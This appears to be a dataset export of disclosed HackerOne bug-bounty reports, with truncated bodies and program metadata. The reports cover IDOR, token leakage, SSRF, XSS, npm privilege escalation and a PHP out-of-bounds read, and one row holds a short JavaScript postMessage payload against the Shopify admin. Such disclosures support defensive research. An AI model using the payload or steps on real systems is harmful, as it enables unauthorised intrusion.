"handle": "drive_net_inc",
"id": 14633,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "DRIVE.NET, Inc.",
... | false | full | 2020-01-13T12:56:22.183Z | null | null | 46 | {
"asset_identifier": "api.drive2.ru",
"asset_type": "URL",
"databaseId": 30477,
"max_severity": "critical"
} |
439,729 | Add and Access to Labels of any Private Projects/Groups of Gitlab(IDOR) | 2018-11-13T03:44:45.389Z | resolved | **Summary & Description :
If you have a private project or private group then no non member should be able to access any information.But Adding Labels in your Private boards API request is vulnerable to IDOR attack which is leading to add private group/project labels and access it.
##Vulnerable Request for Project :
... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/QUAjqUf576QNBhxg691WB8YG/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "gitlab",
"id": 264,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "A single application for the entire software ... | true | full | 2019-09-19T19:25:06.817Z | {
"id": 55,
"name": "Insecure Direct Object Reference (IDOR)"
} | null | 20 | null |
13,557 | Leaking of password reset token through referer | 2014-05-27T08:10:06.992Z | informative | When we request a password reset link, after that before Writing a new password, Going to an External link would cause Referer leakage...
Remote Address:74.125.68.95:443
Request URL:https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,400,700
Request Method:GET
Status Code:200 OK
Request Headers... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/jm049swxg6n10ucqpftu9cz4lpg5/ede8cd84a64d5392a2bb88ecb598721116469c27c015c2caa77148f11e211d58"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "factlink",
"id": 3,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Share your knowledge with the world.",
"... | false | full | 2014-07-08T10:00:32.004Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 2 | null |
263,913 | Content injection via URL parameter. | 2017-08-28T10:48:54.517Z | duplicate | Hello,
The following URL is vulnerable to content & code injection.
https://labs.data.gov/dashboard/validate
https://labs.data.gov/dashboard/validate?schema=federal-v1.1&output=browser&datajson_url=https%3A%2F%2Flabs.data.gov%2Fdashboard%2Ftest%2Cjson&qa=true&as_sfid=AAAAAAX9aAk4zbcmVPVmNqK8IsF4fTqp5MWg0dD5EUW_RUCLR... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/m12klxx9dpeftkwmqjbt6fg21h06/3c7b305354c9073c106ae3d1701798defaaf5be844... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "gsa_bbp",
"id": 50592,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "GSA Bounty",
"twitter_... | false | full | 2020-02-08T07:45:19.519Z | {
"id": 70,
"name": "Code Injection"
} | null | 9 | {
"asset_identifier": "labs.data.gov",
"asset_type": "URL",
"databaseId": 81476,
"max_severity": "critical"
} |
1,217,702 | Adam and the Deadly Injections | 2021-06-04T17:42:52.214Z | resolved | Hi team adding the flag here
```
███
```
████
I will do the writeup in the below comments before the deadline itself
Thanks
Akshansh
## Impact
.... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/Ghy55ytJLjJt7ZfRXk6jWyYz/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "h1-ctf",
"id": 46757,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Let's save the holidays together! #Togethe... | true | full | 2021-06-18T04:58:09.641Z | {
"id": 8,
"name": "Out-of-bounds Read"
} | null | 13 | {
"asset_identifier": "*.ccc.h1ctf.com",
"asset_type": "WILDCARD",
"databaseId": 72510,
"max_severity": "none"
} |
883,867 | Inject page in admin panel via Shopify.API.pushState [New Payload] | 2020-05-27T19:05:49.705Z | resolved | The correction for #868615, allows you to use new payload:
```js
const ctx = window.open(location.origin+'/admin/themes', '_blank')
const data = JSON.stringify({
message: 'Shopify.API.replaceState',
data: {pathname: "abc:d../pages/xss#//"}
});
ctx.postMessage(data)
```
## Impact
A... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/m8EUENYLU5dmCd7GCktjyfc8/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "shopify",
"id": 1382,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Shopify is a multi-channel commerce platfor... | true | full | 2020-12-27T22:14:47.302Z | {
"id": 63,
"name": "Cross-site Scripting (XSS) - DOM"
} | null | 19 | {
"asset_identifier": "your-store.myshopify.com",
"asset_type": "URL",
"databaseId": 413,
"max_severity": "critical"
} |
838,510 | user can bypass password enforcement when federated sharing is enabled | 2020-04-03T21:34:58.933Z | resolved | If the admin forces password for link shares and federated shares are enabled, users can bypass this enforcement. Tested with Nextcloud 18.0.3
Steps to reproduce:
- enable password enforcement for link shares as admin
- as user1 create a link share with password
- open the link share in a separate browser session a... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/michag86",
"username": "michag86",
"verifie... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nextcloud",
"id": 13291,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Access, share and protect your files, ca... | true | full | 2022-06-01T13:52:58.109Z | null | null | 8 | {
"asset_identifier": "nextcloud/server",
"asset_type": "SOURCE_CODE",
"databaseId": 13,
"max_severity": "critical"
} |
1,188,725 | No Valid SPF Records at sifchain.finance | 2021-05-08T00:31:04.363Z | informative | Hello,
There is any issue No valid SPF Records
Desciprition :
There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing is a tactic used in phishing and spam campaigns be... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/oe4lrc71ykbzmo7891ic6f26cbf4/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "sifchain",
"id": 51877,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The world's first omni-chain decentralize... | false | full | 2021-12-09T17:51:42.789Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 0 | {
"asset_identifier": "https://github.com/sifchain/sifnode",
"asset_type": "SOURCE_CODE",
"databaseId": 61275,
"max_severity": "critical"
} |
846,184 | Blind SSRF at https://chat.makerdao.com/account/profile | 2020-04-10T06:34:58.509Z | informative | {
"cleared": false,
"disabled": true,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/losthacker",
"username": "losthacker",
"veri... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "makerdao_bbp",
"id": 38065,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "BlockDev Sp. Z o.o",
... | false | no-content | 2020-04-14T11:32:49.287Z | {
"id": 68,
"name": "Server-Side Request Forgery (SSRF)"
} | null | 6 | {
"asset_identifier": "chat.makerdao.com",
"asset_type": "URL",
"databaseId": 36669,
"max_severity": "critical"
} | |
223,172 | Просмотр привязного к странице email, всего лишь раз скомпрометировав письмо-уведомление | 2017-04-23T10:21:33.090Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/nS7rNaLQVwztSp3zfcDqNCHF/9a55e00ecd2cdf18a7f40678e6836e4cdc90bf95eb4b50c43f5fb775da40bb65"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "vkcom",
"id": 1254,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "VKontakte is the largest European social net... | true | no-content | 2018-02-20T22:41:35.636Z | {
"id": 46,
"name": "Privacy Violation"
} | null | 5 | null | |
358,359 | Privilage escalation with malicious .npmrc | 2018-05-28T16:58:49.235Z | informative | Hello.
I'm forwarding to you my conversation with npm staff regarding security issue. It allows to escalate to root privilages of victim using either:
a) basic social engineering - convincing victim to run npm in attacker-controlled folder (eg. repository), including such innocent ones like "npm help" or "npm whoami"... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/ginden",
"username": "ginden",
"verified": ... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nodejs-ecosystem",
"id": 23949,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "This program was used to handle v... | false | full | 2018-06-30T14:34:57.891Z | {
"id": 75,
"name": "Privilege Escalation"
} | null | 3 | null |
127,158 | Possibility to get private email using UUID | 2016-03-31T16:24:34.412Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/011/270/598dc823eda82bea7159c9f03f2a4bc32b174706_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "uber",
"id": 314,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Uber",
"twitter_handle": ""... | true | no-content | 2016-06-15T16:51:10.222Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 82 | null | |
235,605 | Remote Code Execution (RCE) in DoD Websites | 2017-06-01T20:39:34.131Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/146/816/bcf0f02fbb0a5629f13d893f184c2d982cfaeadf_original.jpeg/ede8cd84a64d5392a2bb88ecb598721... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | no-content | 2018-04-17T18:24:01.031Z | {
"id": 70,
"name": "Code Injection"
} | null | 17 | null | |
1,755,552 | Exceed photo dimensions, Flickr.com | 2022-10-30T17:02:31.378Z | informative | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/vb2e9xlf9ar9s98eqj06g9bfow5r/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "flickr",
"id": 32982,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Flickr is a global community united by phot... | true | no-content | 2022-11-07T17:53:25.895Z | null | null | 7 | {
"asset_identifier": "*.flickr.com",
"asset_type": "WILDCARD",
"databaseId": 14539,
"max_severity": "critical"
} | |
874,228 | HTML Injection leads to XSS on███ | 2020-05-14T13:22:43.123Z | resolved | ###Hello Team!
###I just found a HTML injection in subdomain████ that leads XSS with several payloads, let me show you the POC.
##POC 1 (Firefox 76)
█████
---
##POC 2 (Chrome 81)
███████
---
## Impact
An attacker could use the domain to trick users to execute malicious javascript code.
## Step-by-step Reprodu... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/v7w5tklrw2ko1z2m6tgjq9kxzus1/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | full | 2020-07-30T17:46:24.596Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 4 | null |
283,644 | Out-Of-Bounds Read in timelib_meridian() | 2017-10-28T00:16:57.759Z | resolved | Description
While deserializing an invalid dateTime value, wddx_deserialize() would result in a heap out-of-bounds read in timelib_meridian(). As wddx_deserialize() is exposed to network data, and sometimes echo the results back to client, this issue could potentially allow remote peeking of the process memory. It shou... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/xixabangm4",
"username": "xixabangm4",
"ver... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2019-10-14T04:38:08.877Z | {
"id": 9,
"name": "Buffer Over-read"
} | null | 2 | {
"asset_identifier": "PHP",
"asset_type": "OTHER",
"databaseId": 84120,
"max_severity": "none"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.